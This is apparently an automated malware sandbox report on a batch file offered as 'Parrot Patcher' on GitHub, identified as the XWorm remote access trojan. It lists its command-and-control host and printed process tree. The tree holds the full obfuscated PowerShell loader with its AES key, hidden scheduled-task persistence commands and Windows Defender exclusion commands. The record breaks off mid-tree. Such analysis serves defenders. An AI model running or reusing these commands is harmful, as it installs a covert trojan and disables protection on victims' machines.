Overview

overview

10

Static

static

1

URLScan

urlscan

https://github.com/L...

windows10-2004-x64

10

Analysis

  • max time kernel
    145s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-09-2024 20:42

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://github.com/Littleratman/Parrot-Patcher/releases/download/ParrotPatcher/ParrotPatcherLoader.bat

Score
10/10
xwormdiscoveryexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:21653

order-detail.gl.at.ply.gg:21653
Mutex

hFmBg1HXiHlNq5hB

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 3 IoCs
  • NTFS ADS 4 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 61 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Littleratman/Parrot-Patcher/releases/download/ParrotPatcher/ParrotPatcherLoader.bat
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:116
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdc66846f8,0x7ffdc6684708,0x7ffdc6684718
      2⤵
        PID:2068
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,1194509309584311017,4877890786659814368,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2288 /prefetch:2
        2⤵
          PID:1468
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,1194509309584311017,4877890786659814368,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1876 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:332
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,1194509309584311017,4877890786659814368,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8
          2⤵
            PID:1236
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1194509309584311017,4877890786659814368,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
            2⤵
              PID:1908
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1194509309584311017,4877890786659814368,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
              2⤵
                PID:3800
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,1194509309584311017,4877890786659814368,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5420 /prefetch:8
                2⤵
                  PID:4564
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,1194509309584311017,4877890786659814368,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5420 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:5044
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2104,1194509309584311017,4877890786659814368,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4776 /prefetch:8
                  2⤵
                    PID:2628
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1194509309584311017,4877890786659814368,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:1
                    2⤵
                      PID:4524
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,1194509309584311017,4877890786659814368,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5876 /prefetch:8
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1528
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ParrotPatcherLoader.bat" "
                      2⤵
                        PID:2704
                        • C:\Windows\system32\net.exe
                          net file
                          3⤵
                            PID:1112
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 file
                              4⤵
                                PID:4032
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('igimhidT1w9X9vR9LV3GYpqFJfxUYKagKL4RbRUSjPQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('63fsnRenOi4+F2QVs65EJQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XHxNc=New-Object System.IO.MemoryStream(,$param_var); $UmBxO=New-Object System.IO.MemoryStream; $MfsxI=New-Object System.IO.Compression.GZipStream($XHxNc, [IO.Compression.CompressionMode]::Decompress); $MfsxI.CopyTo($UmBxO); $MfsxI.Dispose(); $XHxNc.Dispose(); $UmBxO.Dispose(); $UmBxO.ToArray();}function execute_function($param_var,$param2_var){ $xFPAd=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $knMoI=$xFPAd.EntryPoint; $knMoI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\Downloads\ParrotPatcherLoader.bat';$lMjyu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\ParrotPatcherLoader.bat').Split([Environment]::NewLine);foreach ($WAAwD in $lMjyu) { if ($WAAwD.StartsWith(':: ')) { $fTAft=$WAAwD.Substring(3); break; }}$payloads_var=[string[]]$fTAft.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                              3⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Modifies registry class
                              • NTFS ADS
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5056
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_690_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_690.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5192
                              • C:\Windows\System32\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_690.vbs"
                                4⤵
                                • Checks computer location settings
                                PID:5388
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_690.bat" "
                                  5⤵
                                    PID:5512
                                    • C:\Windows\system32\net.exe
                                      net file
                                      6⤵
                                        PID:5572
                                        • C:\Windows\system32\net1.exe
                                          C:\Windows\system32\net1 file
                                          7⤵
                                            PID:5596
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('igimhidT1w9X9vR9LV3GYpqFJfxUYKagKL4RbRUSjPQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('63fsnRenOi4+F2QVs65EJQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XHxNc=New-Object System.IO.MemoryStream(,$param_var); $UmBxO=New-Object System.IO.MemoryStream; $MfsxI=New-Object System.IO.Compression.GZipStream($XHxNc, [IO.Compression.CompressionMode]::Decompress); $MfsxI.CopyTo($UmBxO); $MfsxI.Dispose(); $XHxNc.Dispose(); $UmBxO.Dispose(); $UmBxO.ToArray();}function execute_function($param_var,$param2_var){ $xFPAd=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $knMoI=$xFPAd.EntryPoint; $knMoI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_690.bat';$lMjyu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_690.bat').Split([Environment]::NewLine);foreach ($WAAwD in $lMjyu) { if ($WAAwD.StartsWith(':: ')) { $fTAft=$WAAwD.Substring(3); break; }}$payloads_var=[string[]]$fTAft.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                          6⤵
                                          • Blocklisted process makes network request
                                          • Command and Scripting Interpreter: PowerShell
                                          • Drops startup file
                                          • Adds Run key to start application
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of SetWindowsHookEx
                                          PID:5648
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                                            7⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:5444
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                                            7⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:5856
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\$77wsappx.exe '
                                            7⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:6016
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77wsappx.exe '
                                            7⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:6104
                                          • C:\Windows\System32\schtasks.exe
                                            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77wsappx" /tr "C:\ProgramData\$77wsappx.exe "
                                            7⤵
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:5384
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ParrotPatcherLoader.bat" "
                                  2⤵
                                    PID:5468
                                    • C:\Windows\system32\net.exe
                                      net file
                                      3⤵
                                        PID:5588
                                        • C:\Windows\system32\net1.exe
                                          C:\Windows\system32\net1 file
                                          4⤵
                                            PID:5620
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('igimhidT1w9X9vR9LV3GYpqFJfxUYKagKL4RbRUSjPQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('63fsnRenOi4+F2QVs65EJQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XHxNc=New-Object System.IO.MemoryStream(,$param_var); $UmBxO=New-Object System.IO.MemoryStream; $MfsxI=New-Object System.IO.Compression.GZipStream($XHxNc, [IO.Compression.CompressionMode]::Decompress); $MfsxI.CopyTo($UmBxO); $MfsxI.Dispose(); $XHxNc.Dispose(); $UmBxO.Dispose(); $UmBxO.ToArray();}function execute_function($param_var,$param2_var){ $xFPAd=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $knMoI=$xFPAd.EntryPoint; $knMoI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\Downloads\ParrotPatcherLoader.bat';$lMjyu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\ParrotPatcherLoader.bat').Split([Environment]::NewLine);foreach ($WAAwD in $lMjyu) { if ($WAAwD.StartsWith(':: ')) { $fTAft=$WAAwD.Substring(3); break; }}$payloads_var=[string[]]$fTAft.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                          3⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Modifies registry class
                                          • NTFS ADS
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:5788
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_695_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_695.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                            4⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:5924
                                          • C:\Windows\System32\WScript.exe
                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_695.vbs"
                                            4⤵
                                            • Checks computer location settings
                                            PID:6108
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_695.bat" "
                                              5⤵
                                                PID:5132
                                                • C:\Windows\system32\net.exe
                                                  net file
                                                  6⤵
                                                    PID:5296
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 file
                                                      7⤵
                                                        PID:5312
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('igimhidT1w9X9vR9LV3GYpqFJfxUYKagKL4RbRUSjPQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('63fsnRenOi4+F2QVs65EJQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XHxNc=New-Object System.IO.MemoryStream(,$param_var); $UmBxO=New-Object System.IO.MemoryStream; $MfsxI=New-Object System.IO.Compression.GZipStream($XHxNc, [IO.Compression.CompressionMode]::Decompress); $MfsxI.CopyTo($UmBxO); $MfsxI.Dispose(); $XHxNc.Dispose(); $UmBxO.Dispose(); $UmBxO.ToArray();}function execute_function($param_var,$param2_var){ $xFPAd=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $knMoI=$xFPAd.EntryPoint; $knMoI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_695.bat';$lMjyu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_695.bat').Split([Environment]::NewLine);foreach ($WAAwD in $lMjyu) { if ($WAAwD.StartsWith(':: ')) { $fTAft=$WAAwD.Substring(3); break; }}$payloads_var=[string[]]$fTAft.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                      6⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:1248
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1194509309584311017,4877890786659814368,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6252 /prefetch:1
                                              2⤵
                                                PID:5780
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1194509309584311017,4877890786659814368,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
                                                2⤵
                                                  PID:4392
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1194509309584311017,4877890786659814368,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
                                                  2⤵
                                                    PID:5820
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1194509309584311017,4877890786659814368,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:1
                                                    2⤵
                                                      PID:5796
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,1194509309584311017,4877890786659814368,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4952 /prefetch:2
                                                      2⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:2656
                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                    1⤵
                                                      PID:1508
                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                      1⤵
                                                        PID:4056
                                                      • C:\Windows\System32\rundll32.exe
                                                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                        1⤵
                                                          PID:5244
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ParrotPatcherLoader.bat" "
                                                          1⤵
                                                            PID:5184
                                                            • C:\Windows\system32\net.exe
                                                              net file
                                                              2⤵
                                                                PID:4044
                                                                • C:\Windows\system32\net1.exe
                                                                  C:\Windows\system32\net1 file
                                                                  3⤵
                                                                    PID:2704
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('igimhidT1w9X9vR9LV3GYpqFJfxUYKagKL4RbRUSjPQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('63fsnRenOi4+F2QVs65EJQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XHxNc=New-Object System.IO.MemoryStream(,$param_var); $UmBxO=New-Object System.IO.MemoryStream; $MfsxI=New-Object System.IO.Compression.GZipStream($XHxNc, [IO.Compression.CompressionMode]::Decompress); $MfsxI.CopyTo($UmBxO); $MfsxI.Dispose(); $XHxNc.Dispose(); $UmBxO.Dispose(); $UmBxO.ToArray();}function execute_function($param_var,$param2_var){ $xFPAd=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $knMoI=$xFPAd.EntryPoint; $knMoI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\Downloads\ParrotPatcherLoader.bat';$lMjyu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\ParrotPatcherLoader.bat').Split([Environment]::NewLine);foreach ($WAAwD in $lMjyu) { if ($WAAwD.StartsWith(':: ')) { $fTAft=$WAAwD.Substring(3); break; }}$payloads_var=[string[]]$fTAft.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                                  2⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Modifies registry class
                                                                  • NTFS ADS
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:3924
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
